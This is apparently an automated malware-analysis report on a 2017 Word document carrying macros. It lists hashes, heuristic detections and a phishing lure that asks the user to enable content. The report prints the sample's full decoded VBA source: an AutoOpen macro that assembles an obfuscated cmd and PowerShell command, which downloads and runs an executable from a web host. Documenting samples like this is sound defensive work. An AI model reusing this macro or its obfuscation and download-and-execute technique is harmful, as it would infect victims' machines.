Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ed578e345d591736…

MALICIOUS

Office (OLE)

53.0 KB Created: 2017-01-17 16:44:00 Authoring application: Microsoft Office Word First seen: 2017-02-22
MD5: 1a4f13ba8b35ec04d267771ffbcf99a7 SHA-1: 76d7e377aa2e12b695fc96917bff100d043c25d1 SHA-256: ed578e345d59173608409503ba5ead4f0edf4912cf90a34cd72d04b68952988c
170 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample contains VBA macros, including an AutoOpen macro, and a critical heuristic firing for a potential Shell call. The document body text explicitly prompts the user to "enable editing" and "enable content" to decrypt the document, indicating a social engineering lure. The VBA script is heavily obfuscated but its presence and the heuristics suggest it is designed to execute a malicious payload.

Heuristics 6

  • ClamAV: Doc.Macro.Obfuscation-6394109-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Obfuscation-6394109-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    kfymuji = Array(qc & f & vo & dfe7 & u & q & udp & lzo6 & fb & g8 & yfs2 & c & e1 & le3 & ih5 & ic & E & ymn0 & ar & a5 & izp9 & a1 & o & w0 & xwo & pce & p8 & i6 & a & i0 & u7 & xz2 & ix0 & hhe & i & dy & o9 & cs & tw7 & d & u1 & a6 & la8 & pw8 & tz7 & y & zso & lno & qpy7 & ly3 & hmu & r5 & se & dq & lw & ly & kw & dj & pe & ssa & orr0 & jvi1 & os & x0 & us9 & dw2 & z2 & bo & l7 & enl & etq2 & w & eh9 & s & y3 & db & ad & u0 & ah & jsi8 & du1 & s4 & lsa5 & cc & pi & oj9 & rd & zt & pn & kga4 & …
Shell kfymuji, dpefzosu
End If
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Sub
Sub AutoOpen()
eqawp
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7944 bytes
SHA-256: 02a4144b11f2e1dc470c2f3f3bb3bb0d587f61d2cb76502de7f5de8e61d0f293
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub eqawp()
bo = Array(4062, "ile", 1774, 3857, 3725, 4838, 9775, 7817, 7773, 5086, 3376, 8847, 754, 6107)(1)
ly = Array(6478, 1013, "nT)", 8529, 7067, 7095, 9393, 6977, 9008, 591, 4071, 4119)(2)
tz7 = Array(5814, 8541, 4141, "e^c", 8178, 1258, 4495)(3)
i7 = Array(5372, 7757, 5466, 9748, "'""", 8393, 5242, 2032, 499, 4510, 6571, 2623, 4219, 6163)(4)
ly3 = Array(4070, 5563, 7729, 1618, 6453, 6692, 1492, 5653, 4909, 7734, "TEm")(10)
E = Array(3104, 7258, 609, "pOl", 2846, 190)(3)
enl = Array(9177, 3581, 6856, 6951, 8568, 233, 5798, "abi")(7)
kw = Array(9743, 2896, 9879, 7763, 7599, 7791, 3167, 1591, 1918, 2805, 9217, "^.^", 3606, 9183)(11)
jvi1 = Array(8218, "IL^", 5971, 2492, 3664, 9303, 5797, 6938, 8268)(1)
b0 = Array(296, 4701, 6582, "dAt", 3725, 9999, 2313, 6331, 5202)(3)
izp9 = Array(9583, 7604, 4320, 1200, 2742, 1385, 5900, 511, 4789, " ^B", 3703, 5440)(9)
hhe = Array(1668, 1236, 2516, 8825, 8086, "y^L", 9338, 6318, 2750, 3915, 9217, 1975, 3677)(5)
a6 = Array(6808, "^ne", 7534, 1600)(1)
o9 = Array(608, 6962, 794, 8442, " ^H", 4495, 768, 9066, 3942, 9239, 3873, 4958, 8945)(4)
l7 = Array(9965, 7073, 2312, 8598, 6187, "-ar")(5)
tw7 = Array(857, 6559, 7179, 1855, "^D^")(4)
lzo6 = Array("^ll", 4582, 7963, 9496, 8424, 4655, 2462, 5363, 1771)(0)
g8 = Array(563, 6527, 8688, "xE^", 3945)(3)
ymn0 = Array(9550, 829, 6266, "I^C", 859)(3)
dpefzosu = 0
se = Array(291, ".W^", 8064, 2289, 4084, 373, 3161)(1)
vo = Array(8505, 6903, 6784, 7547, "E /", 8015, 9489, 7157)(4)
i = Array(3829, 6639, 7843, 2305, 8412, 7220, 7934, 7532, 9974, "^e^")(9)
ad = Array(5147, "3eI", 425, 7740)(1)
le3 = Array(5750, 2337, 6786, 6437, 5921, "eC^", 3142, 5729, 2344, 1860, 3123)(5)
us9 = Array("ttp", 5693, 9304, 3609, 3546, 3937, 6157, 6035, 7447, 5438, 4459)(0)
zt = Array(9202, 1955, "aRt", 6259)(2)
i0 = Array(7986, 6644, 2746, 9808, " ^-")(4)
q = Array(5387, 8987, "wer", 2573, 9001)(2)
u0 = Array(2448, 9972, 3648, 7607, "hR.", 1460, 4021, 9934, 9685, 2982, 6391)(4)
pe = Array(4724, 1670, 1563, 3941, 5177, 747, 4072, 7213, 6899, 1298, 8643, 128, "n^L", 7433)(12)
rd = Array(9863, "sT^", 9761, 2246, 5244, 5214)(1)
pi = Array(6080, "xe'", 8731, 7232, 9604)(1)
tc0 = Array(7946, 8236, 3981, 1588, 463, 5422, 5536, 9872, "cE^", 8991, 2710, 4965, 8704)(8)
ssa = Array(3431, 3405, "O^a", 3373, 8965)(2)
u7 = Array(4409, 8590, 335, 7714, 7653, 5505, 4660, 5285, "wI^", 2559, 3022)(8)
a5 = Array(118, 793, 4833, 4757, "   ", 5785)(4)
qpy7 = Array(1373, 2392, 4529, 6665, 6831, 9726, 2270, "^S^")(7)
cs = Array(9498, 1992, 6190, 5938, 8425, 763, 7849, "^Id", 4156, 8966, 6399, 7631)(7)
hmu = Array(".^n", 3893, 2308, 972, 7865, 842, 4565, 5035, 321)(0)
c = Array(9292, 6423, 8717, 7393, " -e", 7587, 5734)(4)
zy8 = Array(7046, 8098, 3773, 5750, 3500, 9176, 9804, "   ", 3672)(7)
dw2 = Array(3164, 6018, 4192, 3034, 5311, "://")(5)
la8 = Array(8515, 5133, 8884, 2463, 2717, "W-o", 454, 4070, 9195, 8808)(5)
w0 = Array(2295, 4975, 903, 8472, 210, 7972, 169, "   ")(7)
xz2 = Array("nDO", 831, 7252, 7348, 3477, 7060, 2893, 5842, 1494, 9653, 2640, 8332, 7257, 6949)(0)
s4 = Array(1896, "ppd", 4354, 8368, 4780)(1)
p8 = Array(8567, 1884, "^pr", 1515, 6321, 5071)(2)
ah = Array(3846, 2522, "exe", 9543, 8894, 2848)(2)
d = Array(597, 9144, 4546, 6436, 7569, 5209, 4285, 1726, 4176, "e^N", 685)(9)
r5 = Array(9454, "eT^", 9180, 3849, 2993)(1)
at0 = Array(6019, 1804, 4287, 1687, 9951, 2040, 2420, 615, 433, "SS ")(9)
u = Array(5058, 5479, 6477, 3074, 4969, 3635, 2084, 4476, 9423, 1807, 5680, "p^O", 1469)(11)
du1 = Array(7471, 430, 3392, 855, "'%A", 7459, 7516, 8148)(4)
oj9 = Array(5557, 1533, 1422, 1294, 3181, ")^;", 2133, 4247, 5098, 8239, 2818, 8201)(5)
xwo = Array(1269, 2560, 2614, 8262, 747, 7848, 1256, 9247, 7873, "  ^", 7753)(9)
dy = Array(7792, 6562, 6159, 542, 477, 5377, 2417, 4054, 9953, 6439, "   ")(10)
ih5 = Array(6163, 9820, 4625, 4170, "uti", 9742)(4)
dq = Array(6215, 4334, 3833, 7660, 6840, 3287, 6841, 689, 6181, 963, 9909, "Ebc")(11)
eh9 = Array(6647, 4383, 3109, 8119, 4109, 7763, "Eir")(6)
udp = Array(1114, 2523, 9053, 5983, 6058, 1137, "sHe", 459, 5482, 2845)(6)
pn = Array(6675, 8264, "^-P", 4720, 6539, 8025, 6866, 1783, 3240, 9312)(2)
f = Array(5882, 4161, ".eX", 6587, 6748, 7780, 3792, 5149, 3935, 4307)(2)
dfe7 = Array(3835, 3887, 2708, 8885, 7722, 6915, 3713, 4954, "c """, 4218)(8)
m = Array(2700, "apP", 4233, 9755, 9647, 2331, 3529, 5397, 5731, 2705, 5202, 9303, 4498)(1)
w = Array(7754, 6963, 5963, 4706, 5532, 6097, "om/")(6)
z2 = Array(1510, 7137, 8719, "eto", 5347, 3294, 4754)(3)
o = Array("ASs", 2298, 6409, 7940, 9729, 5993, 5545, 4049, 7093, 8187, 5334, 2993)(0)
i6 = Array("OfI", 4698, 7987, 5561, 3940, 1922, 8900, 9718, 4624)(0)
zso = Array(2595, 812, 2426, 8310, 9254, 6467, 6489, 513, "  ^", 963, 8637, 867)(8)
qz = Array(3631, 4293, "exE", 5270, 9862, 9395, 6788, 692)(2)
etq2 = Array(2612, 7214, "a.c", 7983)(2)
jsi8 = Array(1040, 7085, 5556, 4962, 7020, "',^", 5242, 7845, 3411, 6056, 2984, 5722, 6897, 3878)(5)
lno = Array(5087, 4747, 7272, 1375, 3229, 3197, 1046, 477, 8393, "s^y", 8250, 7548, 989)(9)
ar = Array(7065, 4799, "Y^ ", 7769, 3504)(2)
ix0 = Array(8900, "wsT", 9943, 1548, 6719, 9210, 1169, 8645, 8476)(1)
pce = Array(2770, 4797, 9241, 3934, 3438, 5878, 2802, 2513, 4714, 7978, "-no")(10)
j = Array(5816, 8361, 8580, 8059, 2396, 4476, 735, "a%.", 9775, 2284, 2106, 9268)(7)
db = Array(8961, 6457, 1227, 2256, "kfI", 6019)(4)
pw8 = Array(1317, 8420, 6804, 2818, "BJ^")(4)
kga4 = Array(7173, 5093, 9713, 2791, 637, "^rO", 5449, 4870, 7213, 3714, 9490, 3752, 1739, 6356)(5)
ic = Array(3142, 6524, 2822, 8964, 9567, 8452, 1308, 1427, "^ON", 1575, 1141, 8821, 2456, 4988)(8)
y3 = Array(2883, "mq/", 9163, 7465, 5893, 7282)(1)
a = Array(2732, 3404, "le^", 9063, 5269, 6946, 7631, 7054, 8361, 3953, 2125, 6379)(2)
orr0 = Array("DF^", 9834, 4736, 8978)(0)
dj = Array(7200, "Dow", 354, 6624, 144, 9575, 3505, 4050, 8183, 2836)(1)
lw = Array(1161, "Lie", 9286, 2550, 4223, 1235, 3565, 1850, 8020)(1)
cc = Array(2497, 3519, 1475, 7177, "%.e", 3496, 6641, 5736, 1747, 810, 3053, 2017, 6206, 8570)(4)
lsa5 = Array(9569, "AtA", 1202, 8656, 9899, 4495, 9412, 7359, 2011, 7560)(1)
a1 = Array("^yP", 6277, 5234, 7169)(0)
qc = Array(3095, 5521, 1010, 9001, "cmd", 4040, 7556, 2300, 2712, 1186, 9042, 1211, 2804, 9610)(4)
uxz = Array("^'%", 9817, 3209, 3262, 432)(0)
yfs2 = Array(4328, 3771, "   ", 9678, 2762)(2)
s = Array(4130, 2902, 3294, 9562, 8899, 3699, 4318, 1237, 8228, "E05", 1058)(9)
e1 = Array(876, 7275, "^X^", 6932)(2)
u1 = Array(8453, 3308, 4813, " ^(", 9211)(3)
x0 = Array(1203, 964, "^'h", 667, 3595, 4529)(2)
y = Array("t^ ", 6473, 265, 312, 4545, 1877, 9482, 5763)(0)
fb = Array(6199, 9552, 8254, 1681, 2397, 4293, 8433, 9178, 3000, 2763, ".^e", 9008, 8108)(10)
os = Array(7852, "e^(", 4632, 2647, 2588, 3610, 9281)(1)

If ActiveDocument.GridDistanceHorizontal > 0 Then
kfymuji = Array(qc & f & vo & dfe7 & u & q & udp & lzo6 & fb & g8 & yfs2 & c & e1 & le3 & ih5 & ic & E & ymn0 & ar & a5 & izp9 & a1 & o & w0 & xwo & pce & p8 & i6 & a & i0 & u7 & xz2 & ix0 & hhe & i & dy & o9 & cs & tw7 & d & u1 & a6 & la8 & pw8 & tz7 & y & zso & lno & qpy7 & ly3 & hmu & r5 & se & dq & lw & ly & kw & dj & pe & ssa & orr0 & jvi1 & os & x0 & us9 & dw2 & z2 & bo & l7 & enl & etq2 & w & eh9 & s & y3 & db & ad & u0 & ah & jsi8 & du1 & s4 & lsa5 & cc & pi & oj9 & rd & zt & pn & kga4 & tc0 & at0 & zy8 & uxz & m & b0 & j & qz & i7)(0)
Shell kfymuji, dpefzosu
End If
End Sub
Sub AutoOpen()
eqawp
End Sub
        

Attribute VB_Name = "Module1"

Attribute VB_Name = "Module2"

Attribute VB_Name = "Module3"

Open this report in the interactive analyzer, or submit your own file for analysis.